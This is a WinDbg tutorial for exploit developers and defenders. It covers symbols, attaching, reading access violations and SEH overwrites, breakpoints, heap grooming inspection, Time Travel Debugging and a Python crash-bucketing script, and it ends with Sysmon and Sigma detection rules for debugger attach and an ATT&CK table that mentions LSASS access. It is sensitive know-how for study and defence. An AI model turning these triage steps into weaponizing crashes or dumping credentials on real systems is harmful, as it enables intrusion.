- The x86 frame places locals, an optional /GS cookie, saved EBP, and the return EIP in a predictable order that linear overwrites exploit.
- /GS inserts a stack canary checked in the epilogue, but does not protect SEH records; the SEH overwrite is the canonical x86 bypass, in turn countered by SafeSEH and SEHOP.
- DEP and ASLR do not stop the overflow itself; they force ROP and info-leak techniques to run shellcode.
- Detect via WER Event ID 1000 (0xC0000005) crash bursts plus Sysmon post-exploitation events, and harden with WDEG, /GS /SAFESEH /DYNAMICBASE /NXCOMPAT, SEHOP, and least privilege.
WinDbg Crash Course: Navigation, Commands, and Workflow for Exploit Devs
Objective: Learn to drive WinDbg against a crashing Windows target (configure symbols, attach in all three modes, read a fault from first principles, master every breakpoint type, inspect the heap, and use the dx data model and Time Travel Debugging) so you can triage crashes and build the workflow exploitation labs depend on.
1. WinDbg Classic vs. WinDbg Preview — Choosing Your Tool
Two editions share the same dbgeng.dll engine but differ in shell and capabilities.
| Feature | WinDbg Classic | WinDbg Preview (WinDbgX) |
|---|---|---|
| Distribution | Windows SDK / WDK | Microsoft Store (UWP) |
| Layout model | Workspace .wsp files | Modern ribbon UI |
| Time Travel Debugging | No | Yes |
| Underlying engine | dbgeng.dll | dbgeng.dll |
Use WinDbg Preview as your daily driver — the ribbon, source overlay, and Time Travel Debugging (TTD) make crash triage faster. Keep Classic available for headless scripting on stripped-down lab VMs where the Store runtime is unavailable. Kernel debugging over serial/network (bcdedit /debug on) is a separate discipline; this tutorial stays user-mode.
2. Symbol Configuration Done Right
Without symbols, every other command degrades to raw addresses. A PDB (.pdb) file maps human-readable source elements — function names, struct layouts, locals — to addresses in the compiled binary. Symbols are generated at build/link time.
Set the symbol path before you launch via the _NT_SYMBOL_PATH environment variable, or in-session with .sympath.
0:000> .sympath cache*C:\Symbols;srv*https://msdl.microsoft.com/download/symbols
0:000> .reload /f
0:000> lm
.reload loads symbols lazily; .reload /f forces immediate load. In lm output, (deferred) means the symbols have not been loaded yet, while (export symbols) means no matching PDB was found and the debugger fell back to the module’s export table. Diagnose failures with !sym noisy, which prints every path the loader probes, then silence it with !sym quiet.
| Command | Purpose |
|---|---|
| .sympath | Display / set / append the symbol path |
| .reload /f | Force immediate symbol load |
| !sym noisy | Verbose symbol-loader trace |
| lm | List modules and symbol-load state |
| x module!pattern | Resolve a symbol name to an address |
| ln address | Find the nearest named symbol to an address |
3. Attaching to a Target: Three Modes
| Mode | How | Use case |
|---|---|---|
| Launch | windbg.exe target.exe | Debug from process start |
| Attach | windbg.exe -p <PID> | Inspect a running process |
| Open dump | windbg.exe -z crash.dmp | Post-mortem analysis |
On launch and attach the debugger stops at an initial break before user code runs. The exception model is two-stage: the debugger sees a first-chance exception first, and only if the target’s own handlers do not resolve it does the second-chance exception fire. Control which exceptions break execution with sxe (enable / break), sxd (disable), and sxi (ignore).
0:000> sxe av ; break on first-chance access violations
0:000> sxe ld:user32 ; break when user32 loads
0:000> g
The sxe ld / g idiom is the canonical way to break exactly when a target module maps into the address space, which is essential for setting breakpoints on code that is not yet present.

4. The Essential Command Vocabulary
Execution control, register/stack inspection, and memory display form the core loop.
| Command | What it does |
|---|---|
| g (F5) | Continue execution of the debuggee |
| p / t | Step over / step into |
| gu | Execute until the current function returns |
| pt / wt | Step to next ret / trace-and-watch a call tree |
| r | Display all general-purpose registers |
| k / kb / kp | Stack trace; kb adds first 3 args; kp adds typed parameters |
| lm / u / uf | List modules / disassemble / disassemble full function |
Memory display and edit commands follow a consistent type-suffix grammar:
| Command | What it does |
|---|---|
| db / dw / dd / dq | Display bytes / words / DWORDs / QWORDs |
| da / du | Display ASCII / Unicode string |
| dp / dv | Display pointer-sized values / local variables |
| dt module!Type [addr] | Dump a typed struct (e.g. dt ntdll!_PEB @$peb) |
| !peb / !teb | Dump the Process / Thread Environment Block |
| eb / ew / ed / eq | Edit byte / word / DWORD / QWORD |
| ea / eu | Write ASCII / Unicode characters to an address |
| s -d start end value | Search memory for a pattern over a range |
| !address | Show virtual mapping, permissions, and region type |
A typical inspection sequence at a fault reads registers, walks the stack, then dumps memory at the stack pointer:
0:000> r
0:000> k
0:000> dd esp L8
0:000> dt ntdll!_EXCEPTION_RECORD @$exr
5. Crash Triage: Reading a Fault from First Principles
When a target faults, the debugger lands on the faulting instruction with an exception record describing the cause. !analyze -v automates first-pass triage, emitting the faulting IP, the decoded exception, the stack, and a probable root cause.
0:000> !analyze -v
FAULTING_IP:
vuln!process_packet+0x4a
0040124a 8801 mov byte ptr [ecx],al
EXCEPTION_RECORD: (.exr -1)
ExceptionCode: c0000005 (Access violation)
ExceptionAddress: 0040124a
EXCEPTION_PARAMETER[1]: 41414141 ; attacker-controlled write target
STACK_TEXT:
0019f7c0 41414141 41414141 41414141 vuln!process_packet+0x4a
Read it methodically: FAULTING_IP is the instruction that trapped; the [ecx] write target of 41414141 (“AAAA”) signals attacker-controlled memory. A corrupted STACK_TEXT full of 41414141 indicates a saved-return-address overwrite. Decode any NTSTATUS with !error 0xC0000005. The MSEC !exploitable extension applies heuristics to estimate exploitability classification; load it with .load msec.dll first.
For Structured Exception Handler overwrites, !exchain walks the handler chain:
0:000> !exchain
0019ffdc: 41414141 ; handler overwritten with attacker bytes
Invalid exception stack at 41414141
A handler pointer of 41414141 confirms an SEH overwrite primitive.

6. Breakpoint Mastery
WinDbg distinguishes software breakpoints (bp, patch an int 3) from hardware breakpoints (ba, debug registers — they trap reads/writes/executes without modifying code).
| Command | What it does |
|---|---|
| bp module!func | Software breakpoint, resolved immediately |
| bu module!func | Unresolved; arms when the module loads |
| bm module!pattern* | Breakpoint on all symbols matching a pattern |
| ba r4 addr | Hardware breakpoint: read 4 bytes (ba e1 = execute, ba w4 = write) |
| bp /1 addr | One-shot breakpoint, auto-clears after firing |
| bl / bd N / be N / bc * | List / disable / enable / clear all breakpoints |
Attach a command string that runs automatically on each break, chaining with ;:
0:000> bu kernel32!WriteFile "k; r eax; g"
0:000> ba w4 0019f7c0 "!address @$ip; g"
Use hit-count throttling to avoid output floods on hot paths, and dx query expressions for true conditional breakpoints:
0:000> bp `vuln!net.c:385` 5 "!teb; k; g"
0:000> bp /w "dx ((int)@ecx) == 0x41414141" vuln!process_packet
The trailing 5 is a pass count, so the first breakpoint only fires on its fifth hit. The bp /w form breaks only when the expression evaluates true, which is far cheaper than breaking and manually re-continuing.
7. Heap Internals Inspection
Heap corruption — use-after-free, overflow into adjacent chunks — is where most modern exploitation lives. The !heap extension family exposes chunk headers and allocation state.
| Command | What it does |
|---|---|
| !heap -s | Summary of all heaps |
| !heap -flt s 0x80 | Show all allocations of size 0x80 |
| !heap -p -all | Walk all allocations in all heaps |
| !heap -l | Detect leaked heap blocks |
0:000> !heap -s
0:000> !heap -flt s 0x80 ; isolate chunks of a target size class
0:000> !heap -p -all ; correlate chunks to allocation call sites
Filtering by size class isolates the chunks an attacker grooms. !heap -p -all walks every block, and when allocation stack traces are being recorded (for example with page heap or gflags +ust) each block can be tied back to its allocation stack, which is how you identify the object straddling a corrupted boundary.
8. The dx Data Model and Scripting
The dx (Debugger Object Model) command exposes debugger state as queryable objects with a LINQ-style syntax — ideal for filtering large outputs and building conditions.
0:000> dx @$curprocess.Modules
0:000> dx @$curthread.Stack.Frames.Select(f => f.Attributes.InstructionOffset)
0:000> dx Debugger.Utility.Control.ExecuteCommand("k")
Debugger.Utility.Control.ExecuteCommand runs any legacy command from inside a dx query, enabling hybrid scripts that mix object queries with classic extensions. Load JavaScript automation with .scriptload script.js and invoke it with .scriptrun.
9. Time Travel Debugging for Exploit Devs
TTD records a full execution trace you can replay forward and backward, then query as data. It is the single biggest accelerator for root-causing memory corruption, because you can step backward from the crash to the write that caused it. WinDbgX must run as Administrator, and TTD is user-mode only in the current public build.
Recording produces a .run trace file. Open it and navigate with the reverse-execution commands:
| Command | What it does |
|---|---|
| !tt 0:0 | Jump to a trace position (here, rewind to start) |
| g- / p- / t- | Reverse continue / step / trace |
| dx @$cursession.TTD.Calls("module!func") | Query every call to a function across the trace |
0:000> !tt 0:0
0:000> dx @$cursession.TTD.Calls("ntdll!RtlAllocateHeap")
0:000> g- ; reverse-continue to the write that preceded the corruption
The workflow for a heap-corruption case: record to crash, query RtlAllocateHeap/RtlFreeHeap calls to find the freed chunk, set a write watchpoint on it, and g- backward to the exact instruction that wrote out of bounds.

10. Automation and Crash Triage Pipelines
For fuzzer integration, drive WinDbg headlessly with -c startup commands and -logo logging. A minimal triage script:
sxe av; g; !analyze -v; .logclose; q
Wrap it from any orchestrator:
import re
import subprocess

cmds = 'sxe av; g; !analyze -v; .logclose; q'
# Launch the target under WinDbg, run the triage commands, and log to out.txt.
subprocess.run(['windbg.exe', '-c', cmds, '-logo', 'out.txt', 'target.exe'])
with open('out.txt', encoding='utf-8', errors='ignore') as fh:
    log = fh.read()
m = re.search(r'FAULTING_IP:\s*\n(.+)', log)
print('Fault:', m.group(1).strip() if m else 'no crash')
.logopen / .logclose tee session output to disk for later parsing, turning every fuzzer crash into a structured triage record.
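To turn those logs into structured records, a fuzzing pipeline usually needs a stable key for grouping duplicate crashes. The sketch below assumes the !analyze -v text layout shown in section 5; crash_bucket is a hypothetical helper, and real output varies between debugger versions, so the patterns may need adjusting.

```python
import re


def crash_bucket(log_text: str):
    """Build a 'code@symbol+offset' key from !analyze -v text, or None if no fault."""
    code = re.search(r"ExceptionCode:\s*([0-9a-fA-F]+)", log_text)
    fault = re.search(r"FAULTING_IP:\s*\n\s*(\S+)", log_text)
    if not code or not fault:
        return None
    return f"{code.group(1).lower()}@{fault.group(1)}"


sample_log = """FAULTING_IP:
vuln!process_packet+0x4a
0040124a 8801 mov byte ptr [ecx],al
EXCEPTION_RECORD: (.exr -1)
ExceptionCode: c0000005 (Access violation)
"""

buckets = {}
for name, text in [("crash_001.txt", sample_log), ("crash_002.txt", sample_log)]:
    buckets.setdefault(crash_bucket(text), []).append(name)
print(buckets)
```

Grouping by exception code plus faulting symbol and offset collapses thousands of fuzzer crashes into a handful of distinct bugs to review.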
11. Common Attacker Techniques
WinDbg is a defensive and authorized-testing tool, but the APIs it relies on overlap heavily with adversary tradecraft — which is precisely why studying it teaches you the telemetry attackers generate.
| Technique | Description |
|---|---|
| Process attach | OpenProcess(PROCESS_ALL_ACCESS) + DebugActiveProcess mirror injection-stager behavior |
| Memory read/write | ReadProcessMemory / WriteProcessMemory underpin both debugging and code patching |
| Module enumeration | lm, !peb, !teb mirror malware’s runtime module/OS reconnaissance |
| Exploitability triage | !analyze -v, !exploitable, !exchain are used to weaponize crashes |
| TTD trace harvesting | .run files capture sensitive in-memory data during analysis |
An attacker who reads LSASS or any other process with the same primitives WinDbg uses generates near-identical handle and memory-access telemetry, so a defender who understands WinDbg also understands the indicators.
12. Defensive Strategies & Detection
Debugger activity is observable through process-creation, handle-access, and named-pipe telemetry.
| Sysmon Event ID | Relevance |
|---|---|
| Event ID 1 (Process Create) | windbg.exe / windbgx.exe launch; command line reveals -p PID attach or -z dump |
| Event ID 10 (ProcessAccess) | Attach yields OpenProcess with GrantedAccess: 0x1fffff; SourceImage is windbg.exe |
| Event ID 8 (CreateRemoteThread) | Debugger-injection / anti-anti-debug patterns |
| Event ID 17/18 (Pipe Create/Connect) | Kernel debugging over \\.\pipe\... |
Behavioral indicators for blue teams: windbg.exe -p <PID> on the command line (live attach), presence of dbgsrv.exe / ntsd.exe (remote/headless debug server), msec.dll loaded into a session (active exploitability assessment), and .run TTD trace files written to disk.
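The command-line indicators can be checked mechanically against process-creation events. The following is a rough Python sketch, assuming the event has already been reduced to an image path and a command-line string; the `classify_debugger_cmdline` helper and its return shape are hypothetical, and the image list only covers the debuggers named in this section.

```python
import re
from typing import Optional

# Debugger images named in this section; extend for your environment.
DEBUGGER_IMAGES = ("windbg.exe", "windbgx.exe", "ntsd.exe")

# -p <PID> attaches to a live process; -z <file> opens a dump.
ATTACH_PID = re.compile(r"(?:^|\s)-p\s+(\d+)\b")
OPEN_DUMP = re.compile(r'(?:^|\s)-z\s+("[^"]+"|\S+)')


def classify_debugger_cmdline(image: str, command_line: str) -> Optional[dict]:
    """Return attach/dump details for a debugger launch, else None."""
    name = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if name not in DEBUGGER_IMAGES:
        return None
    attach = ATTACH_PID.search(command_line)
    dump = OPEN_DUMP.search(command_line)
    return {
        "image": name,
        "attach_pid": int(attach.group(1)) if attach else None,
        "dump_path": dump.group(1).strip('"') if dump else None,
    }


print(classify_debugger_cmdline(r"C:\Debuggers\windbg.exe", "windbg.exe -p 4242"))
```

A live attach (`attach_pid` set) on a production host deserves more scrutiny than opening a dump, which touches no running process.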
A Sigma rule for full-access process attach by a debugger:
title: Debugger Full-Access Attach to Process
logsource:
    product: windows
    service: sysmon
detection:
    selection:
        EventID: 10
        SourceImage|endswith:
            - '\windbg.exe'
            - '\windbgx.exe'
        GrantedAccess: '0x1fffff'
    condition: selection
level: medium
Pair Sysmon with the Microsoft-Windows-Kernel-Process ETW provider and Security Event 4688 (enable Audit Process Creation with command-line capture). Restrict SeDebugPrivilege on production hosts so non-admins cannot attach to other users’ or SYSTEM processes, and never expose kernel-debug ports on networked machines.
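To sanity-check the rule's logic against sample events before deploying it, the selection can be mirrored in a few lines of Python. This is a sketch only: it assumes each Sysmon event has been parsed into a dict keyed by field name, and `matches_rule` is a hypothetical helper, not part of any Sigma tooling. Unlike the string match in the rule, it compares the access mask numerically.

```python
PROCESS_ALL_ACCESS = 0x1FFFFF
DEBUGGER_SUFFIXES = ("\\windbg.exe", "\\windbgx.exe")


def matches_rule(event: dict) -> bool:
    """Mirror the rule's selection: Event ID 10, debugger source, full access."""
    if str(event.get("EventID")) != "10":
        return False
    # Sigma string matching is case-insensitive, so normalize the path.
    source = str(event.get("SourceImage", "")).lower()
    if not source.endswith(DEBUGGER_SUFFIXES):
        return False
    try:
        granted = int(str(event.get("GrantedAccess", "")), 16)
    except ValueError:
        return False
    return granted == PROCESS_ALL_ACCESS


# Illustrative event; field values are made up.
sample_event = {
    "EventID": 10,
    "SourceImage": r"C:\Debuggers\WinDbg.exe",
    "TargetImage": r"C:\Apps\target.exe",
    "GrantedAccess": "0x1FFFFF",
}
print(matches_rule(sample_event))
```

Running known-benign and known-suspicious events through a check like this is a quick way to estimate how noisy the rule will be in a given environment.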
MITRE ATT&CK Mapping
| Technique | MITRE ID | Detection |
|---|---|---|
| Native API | T1106 | EDR hooks on OpenProcess / ReadProcessMemory |
| Process Injection | T1055 | Sysmon Event ID 10, GrantedAccess masks |
| Process Injection: DLL Injection | T1055.001 | LdrLoadDll / .load activity in traces |
| Debugger Evasion | T1622 | IsDebuggerPresent / heap-flag / timing probes |
| OS Credential Dumping | T1003 | Handle access to lsass.exe (authorized DFIR only) |
| System Information Discovery | T1082 | !peb / !teb / lm-equivalent runtime recon |
13. Tools for WinDbg Analysis
| Tool | Description | Link |
|---|---|---|
| WinDbg Preview | Modern debugger with TTD | microsoft.com |
| WinDbg Classic | SDK/WDK debugger for headless scripting | microsoft.com |
| Process Hacker | Live handle / memory inspection | processhacker.sourceforge.io |
| Process Monitor | File / registry / process tracing | live.sysinternals.com |
| x64dbg | User-mode disassembler-debugger | x64dbg.com |
| Ghidra | Static reverse engineering | ghidra-sre.org |
| Volatility | Memory-forensics framework | volatilityfoundation.org |
| msec.dll (!exploitable) | Heuristic exploitability triage | MSEC release |
14. Summary
- WinDbg is the exploit developer’s primary lens into a faulting Windows process — and mastering it means mastering the telemetry attackers generate.
- Correct symbol configuration (.sympath, .reload /f, !sym noisy) is the prerequisite that makes every other command meaningful.
- !analyze -v, !exchain, and !heap turn a raw access violation into a root-caused, classified crash; dx queries and TTD let you step backward to the exact corrupting write.
- Master all breakpoint types (bp, bu, bm, hardware ba, one-shot /1, command and dx-conditional breaks) to control execution precisely.
- Detect debugger and attach activity via Sysmon Event ID 1 and 10 (GrantedAccess: 0x1fffff), Event 4688 command-line auditing, and restricted SeDebugPrivilege on production hosts.